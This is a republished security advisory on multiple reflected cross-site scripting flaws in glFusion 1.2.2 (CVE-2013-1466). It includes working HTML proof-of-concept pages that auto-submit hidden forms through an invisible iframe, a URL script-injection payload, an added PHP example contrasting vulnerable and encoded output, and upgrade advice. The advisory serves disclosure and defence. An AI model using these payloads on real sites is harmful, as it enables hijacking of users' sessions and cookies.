
glFusion 1.2.2 Multiple XSS Vulnerabilities and Fixes - Website Security - zixuephp

Source: zixuephp.com    Date: 2015-04-17 11:59


Affected product: glFusion
Vendor: http://www.glfusion.org/
Vulnerable versions: 1.2.2 and probably prior
Tested version: 1.2.2
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in glFusion, which can be exploited to perform Cross-Site Scripting attacks.
 
glFusion has a "bad_behaviour" plugin (installed by default) that verifies the HTTP Referer header, aimed at protecting against spambots. The plugin also makes reflected XSS attacks against the application a little more complex. To bypass this restriction, the PoC (Proof-of-Concept) code for vulnerabilities 1.1 – 1.3 modifies the HTTP Referer header. These PoCs were successfully tested in the latest available version of Mozilla Firefox (18.0.1).
 
 
1) Multiple Cross-Site Scripting (XSS) in glFusion: CVE-2013-1466
 
1.1 The vulnerability exists due to insufficient filtration of user-supplied data in the "subject" HTTP POST parameter passed to the "/profiles.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
 
The PoC code below uses the "alert()" JavaScript function to display the user's cookies:
 
 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<script>
    var x = 0
    function go2() { location.replace("") }
    function go() {
        if(x) return
        x += 1
        try {
            var html = '<form target="_parent" action="http://[host]/profiles.php" method="post">'
            html += '<input type="hidden" name="uid" value="2">'
            html += '<input type="hidden" name="author" value="author">'
            html += '<input type="hidden" name="message" value="1">'
            html += '<input type="hidden" name="message_html" value="1">'
            html += '<input type="hidden" name="authoremail" value="mail@mail.com">'
            html += '<input type="hidden" name="postmode" value="html">'
            html += '<input type="hidden" name="what" value="contact">'
            html += '<input type="hidden" name="subject" value=\'" onmouseover="javascript:alert(document.cookie);"\'></form>'
            window.frames[0].document.body.innerHTML = html
            window.frames[0].document.forms[0].submit()
        } catch(e) {
            go2()
        }
    }
</script>
<iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden">
</iframe>
<script>
    window.setTimeout('go2()', 3333)
</script>
</body>
</html>
 
 
 
1.2 The vulnerabilities exist due to insufficient filtration of user-supplied data in the "address1", "address2", "calendar_type", "city", "state", "title", "url" and "zipcode" HTTP POST parameters passed to the "/calendar/index.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
 
The PoC code below uses the "alert()" JavaScript function to display the user's cookies:
 
 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<script>
    var x = 0
    function go2() { location.replace("") }
    function go() {
        if(x) return
        x += 1
        try {
            var html = '<form target="_parent" action="http://[host]/calendar/index.php" method="post">'
            html += '<input type="hidden" name="mode" value="Submit">'
            html += '<input type="hidden" name="savecal" value="Submit">'
            html += '<input type="hidden" name="address1" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
            html += '<input type="hidden" name="calendar_type" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
            html += '<input type="hidden" name="city" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
            html += '<input type="hidden" name="state" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
            html += '<input type="hidden" name="title" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
            html += '<input type="hidden" name="url" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
            html += '<input type="hidden" name="zipcode" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
            html += '<input type="hidden" name="address2" value=\'" onmouseover="javascript:alert(document.cookie);"\'></form>'
            window.frames[0].document.body.innerHTML = html
            window.frames[0].document.forms[0].submit()
        } catch(e) {
            go2()
        }
    }
</script>
<iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden">
</iframe>
<script>
    window.setTimeout('go2()', 3333)
</script>
</body>
</html>
 
 
 
1.3 The vulnerabilities exist due to insufficient filtration of user-supplied data in the "title" and "url" HTTP POST parameters passed to the "/links/index.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
 
The PoC code below uses the "alert()" JavaScript function to display the user's cookies:
 
 
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<script>
    var x = 0
    function go2() { location.replace("") }
    function go() {
        if(x) return
        x += 1
        try {
            var html = '<form target="_parent" action="http://[host]/links/index.php" method="post">'
            html += '<input type="hidden" name="mode" value="Submit">'
            html += '<input type="hidden" name="title" value=\'" onmouseover="javascript:alert(1);"\'>'
            html += '<input type="hidden" name="url" value=\'" onmouseover="javascript:alert(2);"\'></form>'
            window.frames[0].document.body.innerHTML = html
            window.frames[0].document.forms[0].submit()
        } catch(e) {
            go2()
        }
    }
</script>
<iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden">
</iframe>
<script>
    window.setTimeout('go2()', 3333)
</script>
</body>
</html>
 
 
 
1.4 The vulnerability exists due to insufficient filtration of user-supplied data in the URI after the "/admin/plugins/mediagallery/xppubwiz.php" script name. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.
 
The PoC code below uses the "alert()" JavaScript function to display the user's cookies:

http://[host]/admin/plugins/mediagallery/xppubwiz.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/
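All four findings above share one root cause: a request value (a POST parameter in 1.1–1.3, the path after the script name in 1.4) is written into an HTML attribute without being encoded for that context, so a value beginning with `"` closes the attribute and the rest becomes an event handler. The Referer check of the bad_behaviour plugin does not address this; output encoding does. The following is an added example and not glFusion's own code; the rendering helpers and parameter names are hypothetical stand-ins for the advisory's cases.

```php
<?php
// Added example (not glFusion's code): the unsafe pattern the advisory
// describes beside its hardened form. Helper names are hypothetical.

// Vulnerable pattern: the request value is concatenated straight into a
// double-quoted attribute, so  " onmouseover="alert(1)  closes the attribute
// and injects a handler.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened form: encode for the HTML attribute context. ENT_QUOTES covers
// both quote styles, ENT_SUBSTITUTE keeps invalid UTF-8 from turning the
// whole value into "" (which would silently drop it), and the charset is pinned.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

function render_field_safe(string $name, string $value): string
{
    return '<input type="text" name="' . attr($name) . '" value="' . attr($value) . '">';
}

// Case 1.4: the path after the script name is untrusted just like a POST
// parameter and gets the same treatment before being reflected.
function self_url_safe(string $scriptName, ?string $pathInfo): string
{
    return attr($scriptName . ($pathInfo ?? ''));
}

// Constructed payloads in the shape the advisory's PoCs use.
$payload = '" onmouseover="javascript:alert(document.cookie);"';
$path    = '/"><script>alert(document.cookie);</script>/';

$unsafe = render_field_unsafe('subject', $payload);
$safe   = render_field_safe('subject', $payload);

// The unsafe rendering carries a live event-handler attribute; the hardened
// one keeps every character of the payload inside the attribute value.
assert(str_contains($unsafe, ' onmouseover="'));
assert(!str_contains($safe, ' onmouseover="'));
assert(str_contains($safe, 'value="&quot; onmouseover=&quot;'));
assert(!str_contains(self_url_safe('/admin/plugins/mediagallery/xppubwiz.php', $path), '<script>'));

echo $unsafe, "\n", $safe, "\n";
```

Run with `php -d zend.assertions=1 example.php` so the assertions are evaluated; the first printed line shows the injected handler, the second shows the encoded value.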
 
-----------------------------------------------------------------------------------------------
 
Solution:

Upgrade to glFusion v1.2.2.pl4
 
More Information:
http://www.glfusion.org/article.php/glf122_update_20130130_01
http://www.glfusion.org/filemgmt/viewcat.php?cid=1
 
